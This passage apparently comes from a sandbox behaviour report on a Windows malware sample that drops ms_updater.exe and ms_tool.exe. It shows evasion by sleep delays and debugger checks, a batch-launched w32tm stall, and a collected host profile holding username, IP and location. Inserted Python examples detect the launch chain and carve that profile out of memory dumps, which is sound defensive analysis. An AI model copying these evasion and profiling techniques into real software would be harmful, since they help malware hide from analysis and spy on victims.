                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Memory allocated: 1AFD0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 599844
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 599547
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 599359
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 599130
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 599000
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 598890
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 598776
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 598669
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 598562
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 598453
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 3600000
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 598344
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 598234
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 598106
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 597989
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Window / User API: threadDelayed 667
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Window / User API: threadDelayed 2595
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\mHYqxgSr.log
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Dropped PE file which has not been started: C:\Users\user\Desktop\gOvRVAND.log
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-23406
                  Source: C:\Users\user\Desktop\1hibLFnCm1.exe | API coverage: 9.6 %
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 6764 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -599844s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -599547s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -599359s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -599130s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -599000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -598890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -598776s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -598669s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -598562s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -598453s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 7076 | Thread sleep time: -3600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -598344s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 5868 | Thread sleep time: -60000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -598234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -598106s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 4948 | Thread sleep time: -597989s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 7020 | Thread sleep time: -30000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe TID: 7076 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | File Volume queried: C:\ FullSizeInformation
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Code function: 3_2_00007FFD9BAA8B98 GetSystemInfo,3_2_00007FFD9BAA8B98
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 30000
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exe | Thread delayed: delay time: 60000
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\AppData\Roaming\ms_updater.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                  Source: ms_updater.exe, 00000003.00000002.1764565356.000000001BA57000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld6R
Source: ms_tool.exe, 00000001.00000002.1700859174.000001F61B760000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: w32tm.exe, 00000008.00000002.1810190735.0000012F753B7000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: 0_2_00F5B991 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F5B991
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: 0_2_00F6528D mov ecx, dword ptr fs:[00000030h] 0_2_00F6528D
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: 0_2_00F6CEEC mov eax, dword ptr fs:[00000030h] 0_2_00F6CEEC
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: 0_2_00F72D78 GetProcessHeap, 0_2_00F72D78
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Process token adjusted: Debug
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: 0_2_00F5BAF3 SetUnhandledExceptionFilter, 0_2_00F5BAF3
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: 0_2_00F61C34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F61C34
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: 0_2_00F5BC05 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00F5BC05
Source: C:\Users\user\AppData\Roaming\ms_tool.exe; Code function: 1_2_00007FF68C5E28E4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_00007FF68C5E28E4
Source: C:\Users\user\AppData\Roaming\ms_tool.exe; Code function: 1_2_00007FF68C5E2BE0 SetUnhandledExceptionFilter, 1_2_00007FF68C5E2BE0
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Process created: C:\Users\user\AppData\Roaming\ms_tool.exe "C:\Users\user\AppData\Roaming\ms_tool.exe"
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Process created: C:\Users\user\AppData\Roaming\ms_updater.exe "C:\Users\user\AppData\Roaming\ms_updater.exe"
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat"
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe; Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
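The process tree above is the chain a detection engineer can key on: a dropped EXE directly under %APPDATA%\Roaming runs a .bat from %TEMP% through cmd.exe, and that batch runs chcp 65001 followed by w32tm /stripchart /computer:localhost, a call that has no time-sync purpose against the local host and in effect only waits (period times samples). The block below is an added example, not part of the Joe Sandbox report, that evaluates this pattern over constructed process-creation records; PIDs 6532 (1hibLFnCm1.exe) and 6768 (ms_updater.exe) are taken from the report, every other PID and the benign interactive w32tm check at the end are invented for the test.

```python
r"""Detect the launcher chain seen in the report:

    <exe in %APPDATA%\Roaming>  ->  cmd.exe /C "<%TEMP%\*.bat>"  ->  chcp 65001
                                                                 ->  w32tm /stripchart /computer:localhost ...

Added example over constructed process-creation records, not real telemetry."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed records modelled on the process tree in the report. PIDs 6532
# and 6768 are from the report; the rest, and the benign interactive w32tm
# check against a real time server at the end, are invented for the test.
EVENTS = [
    ProcEvent(6532, 4000, r"C:\Users\user\Desktop\1hibLFnCm1.exe",
              r'"C:\Users\user\Desktop\1hibLFnCm1.exe"'),
    ProcEvent(6700, 6532, r"C:\Users\user\AppData\Roaming\ms_tool.exe",
              r'"C:\Users\user\AppData\Roaming\ms_tool.exe"'),
    ProcEvent(6768, 6532, r"C:\Users\user\AppData\Roaming\ms_updater.exe",
              r'"C:\Users\user\AppData\Roaming\ms_updater.exe"'),
    ProcEvent(6900, 6768, r"C:\Windows\System32\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\jClCs9nEU3.bat"'),
    ProcEvent(6910, 6900, r"C:\Windows\System32\chcp.com", "chcp 65001"),
    ProcEvent(6920, 6900, r"C:\Windows\System32\w32tm.exe",
              "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2"),
    ProcEvent(7000, 4000, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe"'),
    ProcEvent(7010, 7000, r"C:\Windows\System32\w32tm.exe",
              "w32tm /stripchart /computer:time.windows.com /samples:3"),
]

# Polling the local host's own clock has no sync value; the call only burns time.
W32TM_LOCALHOST = re.compile(r"w32tm\s+/stripchart\s+/computer:localhost\b", re.I)
# cmd.exe /C running a batch file dropped under %TEMP%
TEMP_BAT = re.compile(r'/c\s+"?[^"]*\\AppData\\Local\\Temp\\[^"]+\.bat"?', re.I)
# the launcher sits directly in %APPDATA%\Roaming, as the dropped files here do
ROAMING_EXE = re.compile(r"\\AppData\\Roaming\\[^\\]+\.exe$", re.I)


def ancestors(events, pid):
    """Walk ppid links upward from pid; stops at an unknown parent or a loop."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid].ppid
    return chain


def find_launcher_chains(events):
    r"""Return (w32tm_pid, launcher_image, saw_chcp) for every w32tm localhost
    stripchart whose parent is cmd.exe running a %TEMP% .bat that was itself
    spawned by an EXE in %APPDATA%\Roaming. saw_chcp records whether the same
    cmd.exe also ran `chcp 65001`, the first command of the batch seen here."""
    hits = []
    for ev in events:
        if not W32TM_LOCALHOST.search(ev.cmdline):
            continue
        chain = ancestors(events, ev.ppid)      # [cmd.exe, launcher, ...]
        if len(chain) < 2:
            continue
        cmd, launcher = chain[0], chain[1]
        if not (cmd.image.lower().endswith("\\cmd.exe") and TEMP_BAT.search(cmd.cmdline)):
            continue
        if not ROAMING_EXE.search(launcher.image):
            continue
        saw_chcp = any(s.ppid == cmd.pid and s.cmdline.lower().startswith("chcp 65001")
                       for s in events)
        hits.append((ev.pid, launcher.image, saw_chcp))
    return hits


if __name__ == "__main__":
    for pid, launcher, chcp in find_launcher_chains(EVENTS):
        print(f"w32tm pid {pid}: launcher {launcher} (chcp 65001 seen: {chcp})")
```

The benign record at the end (an interactive shell querying time.windows.com) is there to show the rule does not fire on ordinary w32tm use; what makes the chain suspicious is the combination of the localhost target, the %TEMP% batch parent and the %APPDATA%\Roaming launcher, not any one element alone.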
Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"?","Has Media Clients (1153)":"?","Has FTP Clients (1153)":"?"},"5.0.1",5,0,"","user","364339","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Roaming","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager
Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: known (Unknown)","Program Manager","8.46.123.33","US / United States of America","New York / New York City"," / "]
Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, ms_updater.exe, 00000003.00000002.1759262008.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager@}
Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager`
Source: ms_updater.exe, 00000003.00000002.1759262008.00000000033A6000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: [{"Has Messengers (1153)":"N","Has Game Clients (1153)":"?","Has Media Clients (1153)":"?","Has FTP Clients (1153)":"?"},"5.0.1",5,0,"","user","364339","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Users\\user\\AppData\\Roaming","Unknown (Unknown)","Unknown (Unknown)","Program Manager","8.46.123.33","US / United States of America","New York / NewX
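The memory strings above are the host-profile record that ms_updater.exe keeps in memory as a JSON array (installed-client flags, username, OS, install directory, foreground window title, public IP and geolocation), and the dump also holds cut-off copies of it. The block below is an added example, not from the report or from DCRat, that carves every complete copy out of a memory dump, drops the truncated copies instead of guessing their tails, and maps the positional elements to names. The field names are assumptions inferred from the values shown on this page, not a documented format, and the dump bytes are constructed from the strings above.

```python
"""Carve host-profile records (the JSON array opening with '[{"Has Messengers')
out of a process-memory dump and name their fields. Added example; field
names are inferred from the values in this report and are assumptions."""
import json
import re

# Constructed dump: the full record from the report, filler bytes, then a
# truncated copy of it, as the report's memory strings show such partial copies.
RECORD = ('[{"Has Messengers (1153)":"N","Has Game Clients (1153)":"?",'
          '"Has Media Clients (1153)":"?","Has FTP Clients (1153)":"?"},'
          '"5.0.1",5,0,"","user","364339","Windows 10 Enterprise 64 Bit",'
          r'"Y","Y","N","C:\\Users\\user\\AppData\\Roaming",'
          '"Unknown (Unknown)","Unknown (Unknown)","Program Manager",'
          '"8.46.123.33","US / United States of America",'
          '"New York / New York City"," / "]')
DUMP = b"\x00" * 16 + RECORD.encode() + b"\x00" * 8 + RECORD[:260].encode() + b"\xff" * 4

START = re.compile(rb'\[\{"Has Messengers')

# Positional meaning of each element, inferred from the sample values (assumed;
# elements whose role is not evident from the value keep a numeric name).
FIELDS = ["client_flags", "version", "field_2", "field_3", "field_4", "username",
          "field_6", "os", "field_8", "field_9", "field_10", "install_dir",
          "field_12", "field_13", "foreground_window", "public_ip", "country",
          "city", "field_18"]


def _close_index(blob, start):
    """Index of the ']' closing the array opened at start, or None if the
    record is cut off before it closes. Tracks JSON strings so brackets or
    backslashes inside values (paths, escapes) do not upset the depth count."""
    depth, in_str, esc = 0, False, False
    for i in range(start, len(blob)):
        c = blob[i:i + 1]
        if in_str:
            if esc:
                esc = False
            elif c == b"\\":
                esc = True
            elif c == b'"':
                in_str = False
            continue
        if c == b'"':
            in_str = True
        elif c in (b"[", b"{"):
            depth += 1
        elif c in (b"]", b"}"):
            depth -= 1
            if depth == 0:
                return i
    return None


def carve_records(blob):
    """Return every complete, parseable record in blob as a Python list.
    Truncated copies are skipped rather than completed."""
    records = []
    for m in START.finditer(blob):
        end = _close_index(blob, m.start())
        if end is None:
            continue
        try:
            records.append(json.loads(blob[m.start():end + 1].decode("utf-8")))
        except (ValueError, UnicodeDecodeError):
            continue
    return records


def profile(record):
    """Map a carved record onto the assumed field names."""
    return dict(zip(FIELDS, record))


if __name__ == "__main__":
    for rec in carve_records(DUMP):
        p = profile(rec)
        print(p["username"], "|", p["os"], "|", p["install_dir"], "|", p["public_ip"], "|", p["country"])
```

Scanning for the opening marker and bracket-matching to the close is more robust on a raw dump than a regex for the whole record, because the tail of the array (window title, IP, geolocation) is exactly the part that varies per victim and per check-in; the public IP and city in the record are also the fields an analyst will want to confirm against the sandbox's own egress, since they describe the analysis machine, not the operator.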
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: 0_2_00F5B675 cpuid 0_2_00F5B675
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: GetLocaleInfoW, 0_2_00F72818
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: GetACP,IsValidCodePage,GetLocaleInfoW, 0_2_00F721B2
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 0_2_00F72941
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: GetLocaleInfoW, 0_2_00F72A47
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: EnumSystemLocalesW, 0_2_00F6821E
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: GetLocaleInfoW, 0_2_00F723AD
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_00F72B16
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: EnumSystemLocalesW, 0_2_00F7249F
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: EnumSystemLocalesW, 0_2_00F72454
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_00F725C5
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: EnumSystemLocalesW, 0_2_00F7253A
Source: C:\Users\user\Desktop\1hibLFnCm1.exe; Code function: GetLocaleInfoW, 0_2_00F68744
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Users\user\AppData\Roaming\ms_updater.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation (9 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation (2 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation (3 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation (3 times)
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\ms_updater.exe; Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
